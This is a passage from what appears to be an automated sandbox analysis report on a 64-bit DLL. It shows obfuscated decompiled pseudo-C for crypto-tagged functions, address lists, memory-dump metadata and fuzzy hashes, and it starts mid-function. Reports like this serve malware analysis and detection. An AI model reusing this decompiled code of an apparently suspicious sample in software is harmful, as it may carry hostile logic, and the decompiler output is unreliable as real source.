				r13b = r13b + 1;
				 *(_t555 + (_t449 - 1) * 8) = _t495;
				_t480 =  *0x131241a0; // 0x0
				 *((long long*)(_t555 + _t479 * 8)) = _t480 - (_t495 >> 0xc) * 0x1aba -  *((intOrPtr*)(_t555 + _t479 * 8)) - 0x12b0;
				_t445 =  *0x13124150; // 0x0
				 *0x13124198 = _t445 -  *0x13124198;
				return  *0x1312416c & 0x0000ffff;
			}
















































































                                0x7ffc130e83c0
                                0x7ffc130e83c0
                                0x7ffc130e83d7
                                0x7ffc130e83e1
                                0x7ffc130e83e6
                                0x7ffc130e83f2
                                0x7ffc130e83f9
                                0x7ffc130e83ff
                                0x7ffc130e8408
                                0x7ffc130e840b
                                0x7ffc130e8413
                                0x7ffc130e8419
                                0x7ffc130e8420
                                0x7ffc130e8428
                                0x7ffc130e8430
                                0x7ffc130e8437
                                0x7ffc130e843a
                                0x7ffc130e8442
                                0x7ffc130e8450
                                0x7ffc130e8461
                                0x7ffc130e846d
                                0x7ffc130e8474
                                0x7ffc130e847b
                                0x7ffc130e8490
                                0x7ffc130e8497
                                0x7ffc130e849e
                                0x7ffc130e84ad
                                0x7ffc130e84b7
                                0x7ffc130e84bf
                                0x7ffc130e84c7
                                0x7ffc130e84cb
                                0x7ffc130e84d2
                                0x7ffc130e84d2
                                0x7ffc130e84de
                                0x7ffc130e84e6
                                0x7ffc130e84ed
                                0x7ffc130e84f8
                                0x7ffc130e84ff
                                0x7ffc130e8517
                                0x7ffc130e852a
                                0x7ffc130e8530
                                0x7ffc130e8534
                                0x7ffc130e853e
                                0x7ffc130e8543
                                0x7ffc130e8546
                                0x7ffc130e854b
                                0x7ffc130e855c
                                0x7ffc130e8561
                                0x7ffc130e8568
                                0x7ffc130e8581
                                0x7ffc130e8588
                                0x7ffc130e8595
                                0x7ffc130e8599
                                0x7ffc130e859d
                                0x7ffc130e85a6
                                0x7ffc130e85ad
                                0x7ffc130e85b2
                                0x7ffc130e85b5
                                0x7ffc130e85ba
                                0x7ffc130e85c3
                                0x7ffc130e85cb
                                0x7ffc130e85d5
                                0x7ffc130e85dc
                                0x7ffc130e85e3
                                0x7ffc130e85ea
                                0x7ffc130e8621
                                0x7ffc130e8632
                                0x7ffc130e8641
                                0x7ffc130e864a
                                0x7ffc130e8651
                                0x7ffc130e8658
                                0x7ffc130e8676
                                0x7ffc130e867f
                                0x7ffc130e8688
                                0x7ffc130e868c
                                0x7ffc130e8691
                                0x7ffc130e8697
                                0x7ffc130e869c
                                0x7ffc130e86a5
                                0x7ffc130e86aa
                                0x7ffc130e86b8
                                0x7ffc130e86d2
                                0x7ffc130e86d8
                                0x7ffc130e86ec
                                0x7ffc130e86fa
                                0x7ffc130e8700
                                0x7ffc130e8707
                                0x7ffc130e8717
                                0x7ffc130e8724
                                0x7ffc130e8735
                                0x7ffc130e873b
                                0x7ffc130e8746
                                0x7ffc130e874c
                                0x7ffc130e8754
                                0x7ffc130e875a
                                0x7ffc130e8765
                                0x7ffc130e8772
                                0x7ffc130e8780
                                0x7ffc130e8788
                                0x7ffc130e8792
                                0x7ffc130e879c
                                0x7ffc130e87aa
                                0x7ffc130e87b4
                                0x7ffc130e87d9
                                0x7ffc130e87dd
                                0x7ffc130e87e2
                                0x7ffc130e87eb
                                0x7ffc130e87f7
                                0x7ffc130e8809
                                0x7ffc130e880d
                                0x7ffc130e8824
                                0x7ffc130e882a
                                0x7ffc130e8837
                                0x7ffc130e8839
                                0x7ffc130e8840
                                0x7ffc130e8853
                                0x7ffc130e8867
                                0x7ffc130e8873
                                0x7ffc130e8878
                                0x7ffc130e887e
                                0x7ffc130e8884
                                0x7ffc130e888e
                                0x7ffc130e8890
                                0x7ffc130e8896
                                0x7ffc130e88ab
                                0x7ffc130e88b0
                                0x7ffc130e88c4
                                0x7ffc130e88cd
                                0x7ffc130e88d7
                                0x7ffc130e88ee
                                0x7ffc130e8902
                                0x7ffc130e8908
                                0x7ffc130e8914
                                0x7ffc130e8919
                                0x7ffc130e8920
                                0x7ffc130e8923
                                0x7ffc130e892f
                                0x7ffc130e8937
                                0x7ffc130e8939
                                0x7ffc130e893f
                                0x7ffc130e895a
                                0x7ffc130e896c
                                0x7ffc130e8973
                                0x7ffc130e8984
                                0x7ffc130e898e
                                0x7ffc130e89ad
                                0x7ffc130e89b4
                                0x7ffc130e89c7
                                0x7ffc130e89dd
                                0x7ffc130e89fc
                                0x7ffc130e8a03
                                0x7ffc130e8a08
                                0x7ffc130e8a12
                                0x7ffc130e8a1d
                                0x7ffc130e8a2f
                                0x7ffc130e8a4f
                                0x7ffc130e8a5e
                                0x7ffc130e8a64
                                0x7ffc130e8a6a
                                0x7ffc130e8a6f
                                0x7ffc130e8a74
                                0x7ffc130e8a79
                                0x7ffc130e8a7f
                                0x7ffc130e8a84
                                0x7ffc130e8a89
                                0x7ffc130e8a91
                                0x7ffc130e8a96
                                0x7ffc130e8a9b
                                0x7ffc130e8aa0
                                0x7ffc130e8aa5
                                0x7ffc130e8aaa
                                0x7ffc130e8aaf
                                0x7ffc130e8ac9
                                0x7ffc130e8ad5
                                0x7ffc130e8adf
                                0x7ffc130e8ae3
                                0x7ffc130e8ae7
                                0x7ffc130e8ae9
                                0x7ffc130e8aec
                                0x7ffc130e8af4
                                0x7ffc130e8afe
                                0x7ffc130e8b01
                                0x7ffc130e8b0b
                                0x7ffc130e8b18
                                0x7ffc130e8b31
                                0x7ffc130e8b39
                                0x7ffc130e8b43
                                0x7ffc130e8b6e
                                0x7ffc130e8b87
                                0x7ffc130e8b9c
                                0x7ffc130e8bbe
                                0x7ffc130e8bc1
                                0x7ffc130e8bcf
                                0x7ffc130e8bec

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: d
                                • API String ID: 0-2564639436
                                • Opcode ID: b19b34ea825deaec7f67e3e56fdf8c6bf6a2b00dbacc86478291ffe791470b8c
                                • Instruction ID: 03365f991a28cfd7dbac68412356b9580d32b9b5315ab21b75e9b8360de7fc11
                                • Opcode Fuzzy Hash: b19b34ea825deaec7f67e3e56fdf8c6bf6a2b00dbacc86478291ffe791470b8c
                                • Instruction Fuzzy Hash: 01225A32A58FA985F7108F16E8407A97BB1FB99768F214136DA8D63764DF3CE060CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC13100D70 Relevance: 1.6, Strings: 1, Instructions: 375COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E00007FFC7FFC13100D70(signed int __edx, signed int __rax, void* __rcx, signed int __r8, long long __r9, void* __r11, signed char _a8, signed int _a16, long long _a24, long long _a32, intOrPtr _a40, intOrPtr _a48, signed int _a56) {
				signed char* _v80;
				long long _v88;
				void* _v96;
				long long _v104;
				signed int _v112;
				long long _v120;
				signed long long _v128;
				signed short _v134;
				signed char _t242;
				signed int _t253;
				signed int _t264;
				signed int _t274;
				signed short _t309;
				signed short _t353;
				signed int _t354;
				void* _t375;
				void* _t377;
				intOrPtr _t386;
				signed long long _t387;
				signed int _t393;
				signed long long _t394;
				signed long long _t396;
				signed long long _t398;
				signed long long _t399;
				signed long long _t403;
				intOrPtr _t406;
				signed long long _t411;
				intOrPtr _t414;
				signed long long _t419;
				signed char* _t422;
				long long _t427;
				intOrPtr _t431;
				intOrPtr _t434;
				signed long long _t436;
				signed long long _t438;
				signed long long _t439;
				signed long long _t450;
				intOrPtr* _t452;
				void* _t459;
				signed short* _t460;
				signed long long _t464;
				signed long long _t466;
				signed long long _t468;
				signed long long _t469;
				signed long long _t471;
				signed char* _t472;
				signed int _t474;
				signed long long _t475;
				void* _t477;
				signed long long _t479;
				intOrPtr _t482;
				signed long long _t484;
				signed long long _t486;
				void* _t488;
				long long _t490;
				signed long long _t492;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __edx;
				_t460 = _t459 - 0x48;
				r11d =  *0x13124148; // 0x0
				_t452 =  *0x13124168 -  *0x131241a0;
				_a8 =  *0x13124124 & 0x000000ff | 0x00000040;
				_t242 = (_a56 & 0x000000ff) + 1;
				r8d = __edx & 0x000000ff;
				r15d = _t242 & 0x000000ff;
				r14d = _t242 & 0x000000ff;
				_a56 = _t242;
				_t475 = __r11 + __r11;
				r11d = r11d + 1;
				_t471 = r11d;
				_v112 = __r8;
				_v134 = r14w;
				 *0x13124148 = r11d;
				r11d = r11d + 1;
				_t353 =  *(__r8 + _t471 * 4) & 0x0000ffff;
				 *_t460 = _t353;
				_v88 = _t452;
				_v120 = __rax;
				r10d =  *(__rax + __rcx) & 0x000000ff;
				_v128 =  *(__r8 + __rax * 4) ^ 0x000009e7;
				_t422 = __rcx - 1;
				_t472 =  &(_t422[_t471]);
				_v80 = _t472;
				_t427 = _a48 +  *0x13124170;
				 *0x13124148 = r11d;
				r8d = _t422[0xae] & 0x000000ff;
				asm("cdq");
				_t479 = _v128;
				_t253 =  *0x13124134; // 0x0
				asm("cdq");
				_v96 = _t427;
				 *(__r8 + 0x14 + _t479 * 4) = _t253 %  *(__r8 + 0x14 + _t479 * 4);
				r8d =  *_t472 & 0x000000ff;
				_v104 = _t427;
				 *_t472 = _t253 /  *(__r8 + 0x14 + _t479 * 4) / __r8;
				asm("cdq");
				r9d = 0xffff;
				_t386 = _a40;
				 *0x13124133 =  *0x13124133 + 0x1a99 %  *0x13124124;
				if ( *((intOrPtr*)(_t386 + 0x2368)) - 0xc < 0) goto 0x13101113;
				_t436 =  *0xabf;
				if ( *((intOrPtr*)(_a32 + _t436 * 2)) - ( *0x13124132 & 0x000000ff) <= 0) goto 0x1310110d;
				if (r14w - ( *(_t386 + _t422) & 0x000000ff) < 0) goto 0x13100f37;
				_t387 =  *0x131241a0; // 0x0
				if (( *0x13124123 & 0x000000ff) ==  *((intOrPtr*)(__r8 + _t387 * 4))) goto 0x131010ce;
				_t484 =  *(__r8 + r11d * 4) % r8d - 1;
				if ( *((intOrPtr*)(0x390 + _t486 * 8)) !=  *((intOrPtr*)(_v96 + _t484 * 4))) goto 0x131010ce;
				_t490 = _t488 + 0xb1f;
				_v96 = _t490;
				if (_t475 != _t490) goto 0x131010ce;
				 *(_t479 + _t422 - 1) = ( *0x13124122 & 0x000000ff) / ( *(_t479 + _t422 - 1) & 0x000000ff);
				 *(__r8 + 0x20 + (_t486 + _t486 * 2) * 4) =  *(__r8 + 0x20 + (_t486 + _t486 * 2) * 4) ^ r13d;
				_t393 =  *0x131241a0; // 0x0
				_t394 = _t393 - 1;
				 *0x131241a0 = _t394;
				_t100 = _t436 - 0x15bf; // -5567
				_t309 = _t100;
				_v104 = _t427;
				r11d =  *(_a40 + _t394 * 4);
				_t264 = _a16 & 0x000000ff;
				_a8 = _t264;
				if (r11d - _t264 < 0) goto 0x13101198;
				r10d =  *0x13124148; // 0x0
				r12d = _a8;
				_t354 = _t353 & 0x0000ffff;
				asm("o16 nop [eax+eax]");
				_t474 = r10d;
				_t438 = r11d;
				r8d =  *(_t438 + _a32) & 0x000000ff;
				r8b = r8b -  *(_t474 + _t422);
				r8b = r8b + 0xd;
				 *(_t474 + _t422) = r8b;
				r9d = _t354;
				r10d =  *0x13124148; // 0x0
				r10d = r10d + 1;
				 *0x13124148 = r10d;
				if (_t354 != _t309) goto 0x131010a6;
				r12d = 0xbcf7;
				_t396 =  *0x13124178; // 0x0
				r9d = r9d + 1;
				 *(_t396 + _t438 * 2 + 0x1a) =  *(_t396 + _t438 * 2 + 0x1a) | _t309 & 0x0000ffff ^ r11w ^  *__r8;
				r10d =  *0x13124148; // 0x0
				_t464 = _t309;
				 *0x13124194 =  *0x13124194 ^ _t396 % _t464;
				if (r9d == _t309 - 1) goto 0x13101050;
				r12d = _a16 & 0x000000ff;
				_v104 = _t427;
				r11d = r11d + 1;
				if (r11d - r12d >= 0) goto 0x13101000;
				r14d = _v134 & 0x0000ffff;
				_t492 = _v96;
				_t482 = _a24;
				goto 0x13101198;
				_t398 =  *_t452;
				_t439 =  *0x13124170; // 0x0
				 *(0xaef + _t398 * 8) = _t439 & _t475;
				 *0x13124124 =  *0x13124124 |  *(_a40 + _t398 * 4);
				_t274 =  *0x13124148; // 0x0
				 *((char*)(_t274 + 0x1e + _t474)) = 0xe8;
				goto 0x13101198;
				r9d = 0xffff;
				_t399 =  *0x131241a0; // 0x0
				r14w = r14w + r9w;
				 *_t460 = ( *_t460 & 0x0000ffff) + r9w;
				 *(_v120 + 0x10 + _t492 * 8) =  *(_a40 + _t399 * 4) |  *((intOrPtr*)(_v120 + 0x2820)) + 0x00001540;
				r8d =  *0x13124124; // 0x0
				 *0x131241a0 =  *0x131241a0 - 1;
				r8d = r8d - 1;
				 *0x13124124 = r8d;
				_t466 = r8d +  *0x131241a8;
				 *0x1312414c =  *0x1312414c ^ _t492 + _t464 & _a8 & 0x000000ff;
				 *0x13124134 =  *0x13124134 ^ r14w & 0xffffffff;
				 *_t466 = (sil & 0xffffffff) -  *_t466;
				 *0x13124124 =  *0x13124124 + 1;
				_t403 = _v112;
				r9d = 0xc;
				if ( *((intOrPtr*)(0xabf + _t403 * 8)) - _t474 >= 0) goto 0x13101260;
				_t153 = _t482 + 0x44; // 0x44
				_t477 = _t153 + 4;
				r9d = r9d + 1;
				r14w = r14w + 0xffff;
				 *(_t482 + 4 + _t403 * 4) =  *(_a48 + _t403 * 2) & 0x0000ffff;
				r8d =  *0x13124120 & 0x0000ffff;
				 *((long long*)(0xabf + _t492 * 8)) = _t403 - 0x1419;
				r8d =  *_t422 & 0x000000ff;
				_t468 = (_t466 << 4) +  *0x13124188;
				 *_t468 =  *_t468 * (_a56 & 0x000000ff);
				if (r9d -  *((intOrPtr*)(0xabf + _v112 * 8)) > 0) goto 0x131011e0;
				r11d = _a16 & 0x000000ff;
				r8d =  *_t422 & 0x000000ff;
				r10d = r11d;
				_t406 =  *0x13124188; // 0x0
				if ( *((intOrPtr*)(_t406 + _t468 * 4)) - r11d > 0) goto 0x131012cb;
				if ( *0x131241a0 - 0x69 <= 0) goto 0x131012cb;
				if (_t492 - 0x238 <= 0) goto 0x131012cb;
				_t375 =  *0x13124168 -  *0x13124158; // 0x0
				if (_t375 >= 0) goto 0x131012cb;
				r8b = r8b + 1;
				 *_t422 = r8b & 0xffffffff;
				 *(_v88 + ( *0x13124168 +  *0x13124168) * 8) =  *0x13124168 +  *0x13124168;
				 *(_v80 - 1) = r11b;
				goto 0x13101386;
				if (( *(_t477 - 4) | _t484 + 0x00000001) !=  *((intOrPtr*)(_t482 + 0xff8))) goto 0x131012e6;
				_t377 =  *0x13124130 - 0xab1; // 0x0
				if (_t377 <= 0) goto 0x1310130e;
				_t411 =  *0x131241a0; // 0x0
				if ( *((intOrPtr*)(_a40 + _t411 * 4)) ==  *((intOrPtr*)(0x268 +  *0x13124124 * 8))) goto 0x13101410;
				r9d =  *(_a40 + _t468 * 4);
				if (r9d - 0x13b4 >= 0) goto 0x13101410;
				asm("cdq");
				 *0x13124170 =  *0x13124170 + 0x921 / r9d;
				_t414 =  *0x13124128; // 0x0
				_t450 =  *0x13124124;
				 *((intOrPtr*)(_t414 + _t450 * 4)) = 0;
				_t469 = _t477 - 0x1ad7 + ((_a56 & 0x000000ff) + 0x00000001 & 0x000000ff);
				 *0x00080260 = _t469;
				r8d = ( *_t460 & 0x0000ffff) + ( *(_t482 + 0xaa0) & 0x0000ffff) + (r11b & 0xffffffff) & 0x0000ffff;
				sil = sil + 1;
				 *0x13124158 = 0x167a;
				_t431 = _a32;
				_t419 = _t450;
				 *0x13124150 = _t419;
				 *(0x268 + _t469 * 8) =  *(0x268 + _t469 * 8) ^ 0x000007d8;
				sil = sil |  *0x131241a0;
				sil = sil | 0x000000d8;
				sil = sil -  *(_t419 + _t431);
				 *(_t419 + _t431) = sil;
				goto 0x13101428;
				_t434 =  *0x13124140; // 0x0
				return ( *(_a48 + _t469 * 4) & 0x0000ffff) -  *((intOrPtr*)(_t434 + _t469 * 4));
			}



























































                                0x7ffc13100d70
                                0x7ffc13100d75
                                0x7ffc13100d7a
                                0x7ffc13100d8a
                                0x7ffc13100d8e
                                0x7ffc13100dab
                                0x7ffc13100db2
                                0x7ffc13100dc1
                                0x7ffc13100dc3
                                0x7ffc13100dc7
                                0x7ffc13100dce
                                0x7ffc13100dd9
                                0x7ffc13100de4
                                0x7ffc13100de7
                                0x7ffc13100dea
                                0x7ffc13100df2
                                0x7ffc13100df7
                                0x7ffc13100e01
                                0x7ffc13100e08
                                0x7ffc13100e0b
                                0x7ffc13100e15
                                0x7ffc13100e1e
                                0x7ffc13100e25
                                0x7ffc13100e31
                                0x7ffc13100e3d
                                0x7ffc13100e42
                                0x7ffc13100e4d
                                0x7ffc13100e53
                                0x7ffc13100e5f
                                0x7ffc13100e66
                                0x7ffc13100e71
                                0x7ffc13100e79
                                0x7ffc13100e7a
                                0x7ffc13100e82
                                0x7ffc13100e8b
                                0x7ffc13100e95
                                0x7ffc13100e9a
                                0x7ffc13100ea4
                                0x7ffc13100ead
                                0x7ffc13100ec1
                                0x7ffc13100ec9
                                0x7ffc13100eca
                                0x7ffc13100ed6
                                0x7ffc13100ede
                                0x7ffc13100eeb
                                0x7ffc13100ef1
                                0x7ffc13100f0c
                                0x7ffc13100f1d
                                0x7ffc13100f1f
                                0x7ffc13100f31
                                0x7ffc13100f3c
                                0x7ffc13100f4b
                                0x7ffc13100f51
                                0x7ffc13100f54
                                0x7ffc13100f5c
                                0x7ffc13100f75
                                0x7ffc13100f7e
                                0x7ffc13100f94
                                0x7ffc13100f9b
                                0x7ffc13100f9e
                                0x7ffc13100fa5
                                0x7ffc13100fa5
                                0x7ffc13100fb3
                                0x7ffc13100fb8
                                0x7ffc13100fbc
                                0x7ffc13100fc4
                                0x7ffc13100fce
                                0x7ffc13100fd4
                                0x7ffc13100fdb
                                0x7ffc13100ff3
                                0x7ffc13100ff5
                                0x7ffc1310100c
                                0x7ffc1310100f
                                0x7ffc13101015
                                0x7ffc1310101a
                                0x7ffc1310101e
                                0x7ffc13101022
                                0x7ffc13101026
                                0x7ffc13101029
                                0x7ffc13101030
                                0x7ffc13101033
                                0x7ffc1310103c
                                0x7ffc1310103e
                                0x7ffc13101050
                                0x7ffc13101057
                                0x7ffc1310106f
                                0x7ffc13101074
                                0x7ffc1310107b
                                0x7ffc1310108d
                                0x7ffc13101096
                                0x7ffc13101098
                                0x7ffc131010a1
                                0x7ffc131010a6
                                0x7ffc131010ac
                                0x7ffc131010b6
                                0x7ffc131010bc
                                0x7ffc131010c1
                                0x7ffc131010c9
                                0x7ffc131010ce
                                0x7ffc131010d1
                                0x7ffc131010db
                                0x7ffc131010f1
                                0x7ffc131010f7
                                0x7ffc13101103
                                0x7ffc13101108
                                0x7ffc1310110d
                                0x7ffc13101113
                                0x7ffc13101126
                                0x7ffc1310112a
                                0x7ffc13101143
                                0x7ffc13101148
                                0x7ffc1310114f
                                0x7ffc13101156
                                0x7ffc13101161
                                0x7ffc1310116f
                                0x7ffc13101178
                                0x7ffc13101182
                                0x7ffc1310118f
                                0x7ffc13101192
                                0x7ffc13101198
                                0x7ffc1310119d
                                0x7ffc131011ab
                                0x7ffc131011b9
                                0x7ffc131011e4
                                0x7ffc131011ec
                                0x7ffc131011ef
                                0x7ffc131011f3
                                0x7ffc131011fa
                                0x7ffc1310121e
                                0x7ffc13101226
                                0x7ffc1310122e
                                0x7ffc1310123b
                                0x7ffc13101250
                                0x7ffc13101260
                                0x7ffc13101269
                                0x7ffc1310126d
                                0x7ffc13101270
                                0x7ffc1310127b
                                0x7ffc13101285
                                0x7ffc1310128e
                                0x7ffc13101297
                                0x7ffc1310129e
                                0x7ffc131012a0
                                0x7ffc131012a9
                                0x7ffc131012ba
                                0x7ffc131012c2
                                0x7ffc131012c6
                                0x7ffc131012d6
                                0x7ffc131012dd
                                0x7ffc131012e4
                                0x7ffc131012e6
                                0x7ffc13101308
                                0x7ffc13101316
                                0x7ffc13101321
                                0x7ffc1310133f
                                0x7ffc13101346
                                0x7ffc1310134d
                                0x7ffc13101354
                                0x7ffc1310135b
                                0x7ffc1310137b
                                0x7ffc1310137e
                                0x7ffc13101397
                                0x7ffc1310139b
                                0x7ffc131013a8
                                0x7ffc131013b6
                                0x7ffc131013be
                                0x7ffc131013ca
                                0x7ffc131013d1
                                0x7ffc131013dd
                                0x7ffc131013e7
                                0x7ffc131013eb
                                0x7ffc131013ef
                                0x7ffc1310140e
                                0x7ffc13101418
                                0x7ffc13101438

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: }Ux;
                                • API String ID: 0-2223722972
                                • Opcode ID: 642c962a0b806545a7463cc6ba01dbab3d006ed2b32fc2925106f0bfd09a13b8
                                • Instruction ID: a1c7f16a9adfeb94717820456cbda86f7bee642cb4401bb46ba5a29210515bdc
                                • Opcode Fuzzy Hash: 642c962a0b806545a7463cc6ba01dbab3d006ed2b32fc2925106f0bfd09a13b8
                                • Instruction Fuzzy Hash: EF02E576A08AE585F720CB26E8407797BB1F759799F254132EA8D63765CF3CE120CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F98F0 Relevance: 1.6, Strings: 1, Instructions: 313COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 41%
                                			E00007FFC7FFC130F98F0(void* __ecx, void* __rax, void* __rdx, signed int __r8, void* __r9, long long __r13) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t197;
				unsigned int _t241;
				signed int _t250;
				void* _t280;
				void* _t281;
				signed int _t294;
				intOrPtr _t297;
				void* _t304;
				signed long long _t315;
				signed long long _t319;
				signed long long _t321;
				signed long long _t329;
				void* _t333;
				intOrPtr _t334;
				void* _t335;
				void* _t336;
				void* _t337;
				signed long long _t341;
				intOrPtr* _t342;
				signed long long _t344;
				intOrPtr _t349;
				intOrPtr _t350;
				intOrPtr _t352;
				void* _t356;
				signed long long _t359;

				r14d = __r9 + 0x1249;
				r9d =  *(_t337 + 0x118);
				 *((intOrPtr*)(_t337 + 0x80)) = __ecx + 0xffffd84e;
				r9d = r9d + 0xfd2;
				 *(_t337 + 0x88) = r14d;
				r10d = __rax - 0x27b2;
				 *(_t337 + 0xd0) = __rdx - 0x36e7;
				 *(_t337 + 0xe8) = r10d;
				r11d = __rdx - 0x114f;
				 *(_t337 + 0xe0) = r11d;
				 *(_t337 + 0xf8) = __rdx - 0x2ad;
				 *((intOrPtr*)(_t337 + 0xf0)) =  *((intOrPtr*)(_t337 + 0xf0)) + 0xc8c;
				 *(_t337 + 0x100) = __r8 - 0x27ae;
				 *(_t337 + 0x84) = __rax + 0x113b;
				if (r9d - __rdx - 0xf35 < 0) goto 0x130f9cf0;
				_t319 =  *((intOrPtr*)(_t337 + 0x110));
				if ( *((long long*)(_t319 + 0x258)) == 0) goto 0x130f9cd6;
				_t334 =  *((intOrPtr*)(_t319 + 0x118));
				r11d = 0;
				_t352 =  *((intOrPtr*)(_t319 + 0x30));
				r8d = 0x2598;
				 *(_t319 + 0x1e0) = 0x3189;
				_t336 = _t335 +  *((intOrPtr*)(_t319 + 0xc0));
				if ( *((intOrPtr*)(_t352 + 0x150)) + 0x1a3 - r8d <= 0) goto 0x130f9a49;
				asm("o16 nop [eax+eax]");
				r8d = r8d + 1;
				 *(_t319 + 0x198) =  *(_t319 + 0x198) + 0x2103 +  *((intOrPtr*)(_t319 + 0x188));
				if (r8d - __rdx < 0) goto 0x130f9a20;
				if ( *((intOrPtr*)(_t334 + 0xb4)) - r11d <= 0) goto 0x130f9c9b;
				asm("o16 nop [eax+eax]");
				 *(_t319 + 0xa0) =  *(_t319 + 0xa0) | 0x00006be2;
				 *(_t319 + 0x120) =  *(_t319 + 0x120) * 0xbdda0def;
				r11d = r11d +  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1a0)) + 0x130)) + 0xffffdc11;
				if (( *( *((intOrPtr*)(_t319 + 0x140)) + 0x1d0) ^ 0x00001b1e) == 0x1f2c) goto 0x130f9ad2;
				 *( *_t319 + 0x1f0) =  *( *_t319 + 0x1f0) ^ _t323 - 0x00003595;
				_t349 =  *((intOrPtr*)(_t319 + 0x1c0));
				r10d = r11d;
				r8d =  *( *((intOrPtr*)(_t319 + 0x1c8)) + 0x188);
				_t341 =  *((intOrPtr*)(_t349 + 0x150)) - 0x3595;
				 *(_t319 + 0x198) =  *(_t319 + 0x198) * _t341;
				 *((intOrPtr*)(_t319 + 0x28)) =  *((intOrPtr*)(_t319 + 0x28)) + _t349 + 0x18;
				r8d =  *( *((intOrPtr*)(_t319 + 0x140)) + 0x60);
				r8d = r8d ^ 0x0000329d;
				if (r8d -  *(_t333 + _t336 + 4) / (__r8 ^ 0x00002031) >= 0) goto 0x130f9c83;
				_t294 =  *(_t319 + 0x120);
				 *((intOrPtr*)(_t319 + 0xa8)) =  *((intOrPtr*)(_t319 + 0xa8)) + _t294;
				_t329 =  *(_t319 + 0x1e0);
				 *((long long*)(_t319 + 0x1f0)) = 0x259b;
				 *(_t319 + 0x120) = _t294 - 1;
				if ( *((intOrPtr*)(_t319 + 0x60)) - _t329 < 0) goto 0x130f9b9b;
				 *(_t319 + 0x198) = 0x37fd;
				_t350 =  *((intOrPtr*)(_t319 + 0x1c8));
				r11d = r11d + ( *(_t350 + 0x130) ^ 0x000023f5);
				 *(_t319 + 0x18) =  *(_t319 + 0x100) * 0x2103;
				_t297 =  *((intOrPtr*)(_t319 + 0x150));
				_t280 = _t297 - 0x27b2;
				if (_t280 <= 0) goto 0x130f9bd9;
				 *((intOrPtr*)(_t319 + 0x48)) =  *((intOrPtr*)(_t319 + 0x48)) + _t297 + 0xffffd84e;
				 *(_t319 + 0x1e0) = _t329 | "y but matter August platforms wavy periodic alternate will stale capital wave technique computer dared hobby garments chose crawled microphone politics arcadia roman demolition hanky softly ticket fur jug plunged tower goodness prop telegram zoological doorway confessed nearby analysis hazard struck pigeon branches persuade stretch previous mute frail flank cone winner combination plane wander sack children traverse skip probability plays dagger midst throne whip final particles trick compassion selling replacement prospect even relay between quarter beg monks yell speedometer dam ";
				_t241 =  *(_t352 + _t336 + r8d * 2) & 0x0000ffff;
				r8d = _t241;
				r8d = r8d & 0x00000fff;
				r8d = r8d +  *((intOrPtr*)(_t333 + _t336));
				if (_t280 == 0) goto 0x130f9c64;
				if (_t280 == 0) goto 0x130f9c15;
				if (_t280 == 0) goto 0x130f9c0c;
				_t281 = (_t241 >> 0xc) - 0xffffffffffffffff - 7;
				if (_t281 != 0) goto 0x130f9c75;
				goto 0x130f9c6b;
				 *((long long*)(_t350 + 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198));
				 *((long long*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198)) =  *((long long*)( *((intOrPtr*)(_t319 + 0x140)) + 0x198)) - 1;
				 *((intOrPtr*)(_t319 + 0x90)) =  *((intOrPtr*)(_t319 + 0x90)) +  *((intOrPtr*)(_t319 + 0x30)) + 0x90;
				_t304 =  *_t319;
				 *(_t319 + 0x20) =  *(_t304 + 0x1b8) * 0x228c;
				goto 0x130f9c6b;
				_t342 = _t341 +  *((intOrPtr*)(_t319 + 0xc0));
				 *_t342 =  *_t342 + _t304;
				if (_t281 != 0) goto 0x130f9b60;
				 *(_t319 + 0x1e0) =  *(_t319 + 0x1e0) ^ 0x0000228c;
				if (r11d -  *((intOrPtr*)(_t334 + 0xb4)) < 0) goto 0x130f9a70;
				r8d = 0x343a;
				 *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1c8)) + 0x1e0)) =  *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x1c8)) + 0x1e0)) + _t342 -  *_t319;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t319 + 0x40)) + 0x130)) == 0x10ee) goto 0x130f9cd6;
				 *(_t319 + 0x1e0) =  *(_t319 + 0x1e0) ^ ( *(_t319 + 0x110) | 0x00003595);
